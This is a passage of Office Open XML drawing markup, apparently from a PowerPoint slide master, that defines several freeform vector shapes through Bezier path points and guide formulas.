                    <a:cubicBezTo>
                      <a:pt x="128" y="117"/>
                      <a:pt x="126" y="132"/>
                      <a:pt x="123" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="157"/>
                      <a:pt x="116" y="168"/>
                      <a:pt x="110" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="185"/>
                      <a:pt x="98" y="192"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="21" y="186"/>
                      <a:pt x="16" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="135"/>
                      <a:pt x="0" y="121"/>
                      <a:pt x="0" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="1" y="73"/>
                      <a:pt x="4" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="47"/>
                      <a:pt x="11" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="18"/>
                      <a:pt x="29" y="12"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="128" y="34"/>
                      <a:pt x="128" y="101"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="105" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="47"/>
                      <a:pt x="91" y="19"/>
                      <a:pt x="65" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="19"/>
                      <a:pt x="23" y="48"/>
                      <a:pt x="23" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="157"/>
                      <a:pt x="37" y="184"/>
                      <a:pt x="64" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="184"/>
                      <a:pt x="105" y="157"/>
                      <a:pt x="10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Freeform 404"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7325" y="372"/>
                <a:ext cx="82" cy="246"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 68 w 68"/>
                  <a:gd name="T1" fmla="*/ 201 h 201"/>
                  <a:gd name="T2" fmla="*/ 45 w 68"/>
                  <a:gd name="T3" fmla="*/ 201 h 201"/>
                  <a:gd name="T4" fmla="*/ 45 w 68"/>
                  <a:gd name="T5" fmla="*/ 31 h 201"/>
                  <a:gd name="T6" fmla="*/ 38 w 68"/>
                  <a:gd name="T7" fmla="*/ 37 h 201"/>
                  <a:gd name="T8" fmla="*/ 27 w 68"/>
                  <a:gd name="T9" fmla="*/ 44 h 201"/>
                  <a:gd name="T10" fmla="*/ 13 w 68"/>
                  <a:gd name="T11" fmla="*/ 50 h 201"/>
                  <a:gd name="T12" fmla="*/ 0 w 68"/>
                  <a:gd name="T13" fmla="*/ 54 h 201"/>
                  <a:gd name="T14" fmla="*/ 0 w 68"/>
                  <a:gd name="T15" fmla="*/ 32 h 201"/>
                  <a:gd name="T16" fmla="*/ 16 w 68"/>
                  <a:gd name="T17" fmla="*/ 26 h 201"/>
                  <a:gd name="T18" fmla="*/ 32 w 68"/>
                  <a:gd name="T19" fmla="*/ 18 h 201"/>
                  <a:gd name="T20" fmla="*/ 47 w 68"/>
                  <a:gd name="T21" fmla="*/ 9 h 201"/>
                  <a:gd name="T22" fmla="*/ 59 w 68"/>
                  <a:gd name="T23" fmla="*/ 0 h 201"/>
                  <a:gd name="T24" fmla="*/ 68 w 68"/>
                  <a:gd name="T25" fmla="*/ 0 h 201"/>
                  <a:gd name="T26" fmla="*/ 68 w 68"/>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1">
                    <a:moveTo>
                      <a:pt x="68" y="201"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="201"/>
                      <a:pt x="45" y="201"/>
                      <a:pt x="45" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="31"/>
                      <a:pt x="45" y="31"/>
                      <a:pt x="45" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="33"/>
                      <a:pt x="41" y="35"/>
                      <a:pt x="38" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="39"/>
                      <a:pt x="31" y="42"/>
                      <a:pt x="27" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="13" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="30"/>
                      <a:pt x="10" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>
                      <a:pt x="27" y="21"/>
                      <a:pt x="32" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="16"/>
                      <a:pt x="42" y="13"/>
                      <a:pt x="47" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="6"/>
                      <a:pt x="56" y="3"/>
                      <a:pt x="59" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="0"/>
                      <a:pt x="68" y="0"/>
                      <a:pt x="68" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="68"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405"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7473" y="374"/>
                <a:ext cx="155" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 127"/>
                  <a:gd name="T3" fmla="*/ 144 h 203"/>
                  <a:gd name="T4" fmla="*/ 110 w 127"/>
                  <a:gd name="T5" fmla="*/ 176 h 203"/>
                  <a:gd name="T6" fmla="*/ 89 w 127"/>
                  <a:gd name="T7" fmla="*/ 196 h 203"/>
                  <a:gd name="T8" fmla="*/ 61 w 127"/>
                  <a:gd name="T9" fmla="*/ 203 h 203"/>
                  <a:gd name="T10" fmla="*/ 35 w 127"/>
                  <a:gd name="T11" fmla="*/ 196 h 203"/>
                  <a:gd name="T12" fmla="*/ 16 w 127"/>
                  <a:gd name="T13" fmla="*/ 178 h 203"/>
                  <a:gd name="T14" fmla="*/ 4 w 127"/>
                  <a:gd name="T15" fmla="*/ 147 h 203"/>
                  <a:gd name="T16" fmla="*/ 0 w 127"/>
                  <a:gd name="T17" fmla="*/ 106 h 203"/>
                  <a:gd name="T18" fmla="*/ 4 w 127"/>
                  <a:gd name="T19" fmla="*/ 60 h 203"/>
                  <a:gd name="T20" fmla="*/ 17 w 127"/>
                  <a:gd name="T21" fmla="*/ 27 h 203"/>
                  <a:gd name="T22" fmla="*/ 37 w 127"/>
                  <a:gd name="T23" fmla="*/ 7 h 203"/>
                  <a:gd name="T24" fmla="*/ 66 w 127"/>
                  <a:gd name="T25" fmla="*/ 0 h 203"/>
                  <a:gd name="T26" fmla="*/ 127 w 127"/>
                  <a:gd name="T27" fmla="*/ 101 h 203"/>
                  <a:gd name="T28" fmla="*/ 104 w 127"/>
                  <a:gd name="T29" fmla="*/ 103 h 203"/>
                  <a:gd name="T30" fmla="*/ 65 w 127"/>
                  <a:gd name="T31" fmla="*/ 19 h 203"/>
                  <a:gd name="T32" fmla="*/ 23 w 127"/>
                  <a:gd name="T33" fmla="*/ 104 h 203"/>
                  <a:gd name="T34" fmla="*/ 64 w 127"/>
                  <a:gd name="T35" fmla="*/ 184 h 203"/>
                  <a:gd name="T36" fmla="*/ 104 w 127"/>
                  <a:gd name="T37" fmla="*/ 1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1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="117"/>
                      <a:pt x="126" y="132"/>
                      <a:pt x="123" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="157"/>
                      <a:pt x="116" y="168"/>
                      <a:pt x="110" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="185"/>
                      <a:pt x="97" y="192"/>
                      <a:pt x="89" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="61" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="192"/>
                      <a:pt x="21" y="186"/>
                      <a:pt x="16" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="169"/>
                      <a:pt x="6" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="135"/>
                      <a:pt x="0" y="121"/>
                      <a:pt x="0" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="1" y="73"/>
                      <a:pt x="4" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="47"/>
                      <a:pt x="11" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="18"/>
                      <a:pt x="29" y="12"/>
                      <a:pt x="37" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="2"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="127" y="34"/>
                      <a:pt x="127" y="101"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="104" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="47"/>
                      <a:pt x="91" y="19"/>
                      <a:pt x="65" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="19"/>
                      <a:pt x="23" y="48"/>
                      <a:pt x="23" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="157"/>
                      <a:pt x="36" y="184"/>
                      <a:pt x="64" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="184"/>
                      <a:pt x="104" y="157"/>
                      <a:pt x="10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406"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7671" y="372"/>
                <a:ext cx="81" cy="246"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 67 w 67"/>
                  <a:gd name="T1" fmla="*/ 201 h 201"/>
                  <a:gd name="T2" fmla="*/ 45 w 67"/>
                  <a:gd name="T3" fmla="*/ 201 h 201"/>
                  <a:gd name="T4" fmla="*/ 45 w 67"/>
                  <a:gd name="T5" fmla="*/ 31 h 201"/>
                  <a:gd name="T6" fmla="*/ 37 w 67"/>
                  <a:gd name="T7" fmla="*/ 37 h 201"/>
                  <a:gd name="T8" fmla="*/ 26 w 67"/>
                  <a:gd name="T9" fmla="*/ 44 h 201"/>
                  <a:gd name="T10" fmla="*/ 13 w 67"/>
                  <a:gd name="T11" fmla="*/ 50 h 201"/>
                  <a:gd name="T12" fmla="*/ 0 w 67"/>
                  <a:gd name="T13" fmla="*/ 54 h 201"/>
                  <a:gd name="T14" fmla="*/ 0 w 67"/>
                  <a:gd name="T15" fmla="*/ 32 h 201"/>
                  <a:gd name="T16" fmla="*/ 15 w 67"/>
                  <a:gd name="T17" fmla="*/ 26 h 201"/>
                  <a:gd name="T18" fmla="*/ 32 w 67"/>
                  <a:gd name="T19" fmla="*/ 18 h 201"/>
                  <a:gd name="T20" fmla="*/ 47 w 67"/>
                  <a:gd name="T21" fmla="*/ 9 h 201"/>
                  <a:gd name="T22" fmla="*/ 59 w 67"/>
                  <a:gd name="T23" fmla="*/ 0 h 201"/>
                  <a:gd name="T24" fmla="*/ 67 w 67"/>
                  <a:gd name="T25" fmla="*/ 0 h 201"/>
                  <a:gd name="T26" fmla="*/ 67 w 67"/>
                  <a:gd name="T2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1">
                    <a:moveTo>
                      <a:pt x="67" y="201"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="201"/>
                      <a:pt x="45" y="201"/>
                      <a:pt x="45" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="31"/>
                      <a:pt x="45" y="31"/>
                      <a:pt x="45" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="33"/>
                      <a:pt x="41" y="35"/>
                      <a:pt x="37" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="39"/>
                      <a:pt x="30" y="42"/>
                      <a:pt x="26" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="13" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="30"/>
                      <a:pt x="10" y="29"/>
                      <a:pt x="15" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>
                      <a:pt x="26" y="21"/>
                      <a:pt x="32" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="16"/>
                      <a:pt x="42" y="13"/>
                      <a:pt x="47" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="6"/>
                      <a:pt x="56" y="3"/>
                      <a:pt x="59" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="0"/>
                      <a:pt x="67" y="0"/>
                      <a:pt x="67" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="67"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Freeform 407"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3461" y="365"/>
                <a:ext cx="218" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 209 h 209"/>
                  <a:gd name="T4" fmla="*/ 81 w 179"/>
                  <a:gd name="T5" fmla="*/ 198 h 209"/>
                  <a:gd name="T6" fmla="*/ 32 w 179"/>
                  <a:gd name="T7" fmla="*/ 202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4 h 209"/>
                  <a:gd name="T22" fmla="*/ 52 w 179"/>
                  <a:gd name="T23" fmla="*/ 83 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 27 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 160 w 179"/>
                  <a:gd name="T29" fmla="*/ 128 h 209"/>
                  <a:gd name="T30" fmla="*/ 153 w 179"/>
                  <a:gd name="T31" fmla="*/ 152 h 209"/>
                  <a:gd name="T32" fmla="*/ 128 w 179"/>
                  <a:gd name="T33" fmla="*/ 151 h 209"/>
                  <a:gd name="T34" fmla="*/ 122 w 179"/>
                  <a:gd name="T35" fmla="*/ 186 h 209"/>
                  <a:gd name="T36" fmla="*/ 165 w 179"/>
                  <a:gd name="T37" fmla="*/ 186 h 209"/>
                  <a:gd name="T38" fmla="*/ 171 w 179"/>
                  <a:gd name="T39" fmla="*/ 174 h 209"/>
                  <a:gd name="T40" fmla="*/ 161 w 179"/>
                  <a:gd name="T41" fmla="*/ 153 h 209"/>
                  <a:gd name="T42" fmla="*/ 88 w 179"/>
                  <a:gd name="T43" fmla="*/ 72 h 209"/>
                  <a:gd name="T44" fmla="*/ 102 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 73 w 179"/>
                  <a:gd name="T47" fmla="*/ 79 h 209"/>
                  <a:gd name="T48" fmla="*/ 64 w 179"/>
                  <a:gd name="T49" fmla="*/ 77 h 209"/>
                  <a:gd name="T50" fmla="*/ 56 w 179"/>
                  <a:gd name="T51" fmla="*/ 100 h 209"/>
                  <a:gd name="T52" fmla="*/ 45 w 179"/>
                  <a:gd name="T53" fmla="*/ 140 h 209"/>
                  <a:gd name="T54" fmla="*/ 38 w 179"/>
                  <a:gd name="T55" fmla="*/ 121 h 209"/>
                  <a:gd name="T56" fmla="*/ 40 w 179"/>
                  <a:gd name="T57" fmla="*/ 143 h 209"/>
                  <a:gd name="T58" fmla="*/ 64 w 179"/>
                  <a:gd name="T59" fmla="*/ 177 h 209"/>
                  <a:gd name="T60" fmla="*/ 70 w 179"/>
                  <a:gd name="T61" fmla="*/ 197 h 209"/>
                  <a:gd name="T62" fmla="*/ 68 w 179"/>
                  <a:gd name="T63" fmla="*/ 183 h 209"/>
                  <a:gd name="T64" fmla="*/ 109 w 179"/>
                  <a:gd name="T65" fmla="*/ 179 h 209"/>
                  <a:gd name="T66" fmla="*/ 115 w 179"/>
                  <a:gd name="T67" fmla="*/ 186 h 209"/>
                  <a:gd name="T68" fmla="*/ 119 w 179"/>
                  <a:gd name="T69" fmla="*/ 171 h 209"/>
                  <a:gd name="T70" fmla="*/ 126 w 179"/>
                  <a:gd name="T71" fmla="*/ 146 h 209"/>
                  <a:gd name="T72" fmla="*/ 126 w 179"/>
                  <a:gd name="T73" fmla="*/ 92 h 209"/>
                  <a:gd name="T74" fmla="*/ 128 w 179"/>
                  <a:gd name="T75" fmla="*/ 135 h 209"/>
                  <a:gd name="T76" fmla="*/ 117 w 179"/>
                  <a:gd name="T77" fmla="*/ 94 h 209"/>
                  <a:gd name="T78" fmla="*/ 104 w 179"/>
                  <a:gd name="T79" fmla="*/ 53 h 209"/>
                  <a:gd name="T80" fmla="*/ 98 w 179"/>
                  <a:gd name="T81" fmla="*/ 37 h 209"/>
                  <a:gd name="T82" fmla="*/ 107 w 179"/>
                  <a:gd name="T83" fmla="*/ 48 h 209"/>
                  <a:gd name="T84" fmla="*/ 87 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 66 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 47 h 209"/>
                  <a:gd name="T92" fmla="*/ 73 w 179"/>
                  <a:gd name="T93" fmla="*/ 48 h 209"/>
                  <a:gd name="T94" fmla="*/ 65 w 179"/>
                  <a:gd name="T95" fmla="*/ 60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3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="156"/>
                      <a:pt x="162" y="158"/>
                      <a:pt x="163" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="165"/>
                      <a:pt x="167" y="168"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="172"/>
                      <a:pt x="174" y="173"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="177"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="170" y="188"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>
                      <a:pt x="125" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="207"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="110" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="81" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="203"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="7" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="65" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="30" y="143"/>
                      <a:pt x="27" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33" y="119"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="38"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="16"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
